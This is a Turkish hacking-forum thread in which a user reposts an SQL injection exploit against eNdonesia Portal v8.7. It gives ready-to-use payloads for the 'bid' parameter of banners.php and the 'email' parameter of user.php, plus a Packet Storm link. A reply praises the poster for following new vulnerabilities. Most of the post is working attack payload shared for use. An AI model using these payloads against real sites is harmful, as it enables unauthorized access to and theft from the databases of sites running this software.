İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

eNdonesia Portal 'banners.php' SQL Inj.

24-03-2019 02:06
#1
Kacamax - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2012
Nereden:
Sivas / 58
Yaş:
30
Mesajlar:
654
Teşekkür (Etti):
167
Teşekkür (Aldı):
66
Konular:
190
Ticaret:
(0) %
# Exploit Basligi / Exploit Title: eNdonesia Portal 'banners.php' SQL Inj.
# Tarih / Date: 19-03-2019
# Exploit Yazar / Exploit Author: Mehmet EMIROGLU
# Yapimci Adresi / Vendor Homepage: Endonesia 8.7 - The Open Source Portal Software
# Yazilim Adresi / Software Link: https://sourceforge.net/projects/endonesia/
# Versiyon / Version: v8.7
# Kategori / Category: Webapps
# Test Edilen Sistem / Tested on: Wamp64, Windows
# CVE: N/A
# Yazilim Aciklamasi / Software Description: eNdonesia bir icerik yönetimi, portal yönetimi, haber yazilimi kisaca coklu kullanim icin uygundur.


Exploit:

Kod:
# POC - SQLi
# Parameters : bid, banners.php
# Saldiri Türü :
-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
# GET Method : http://localhost/endonesia87/banners.php?op=click&bid=-1 or
1=1 and (SELECT 1 and ROW(1,1)>(SELECT
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
Kod:
# POC - SQLi
# Parameters : email, user.php
# Saldiri Türü : 1'+OR+1=1+OR+'cw'='cw
# POST Method : http://localhost/endonesia87/user.php
Exploit Adresi:
https://packetstormsecurity.com/file...Injection.html
Kullanıcı İmzası
“Bir soru sorulduğunda sorudan çok sana soruyu soranı tanımaya çalış”

24-03-2019 03:22
#2
Üyelik tarihi:
12/2006
Nereden:
Siber Alem
Yaş:
32
Mesajlar:
1.111
Teşekkür (Etti):
5
Teşekkür (Aldı):
77
Konular:
12
Ticaret:
(0) %
Hocam güncel açıkları iyi takip ediyorsunuz
Kullanıcı İmzası
Ya Devlet Başa,Ya Kuzgun Leşe
Hak Arayan Varsa Hakkını Verin, Baş Kaldıran Varsa Başını Kesin
II.Abdulhamid Han
Konu Qwx tarafından (24-03-2019 09:47 Saat 09:47 ) değiştirilmiştir.
Kacamax Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı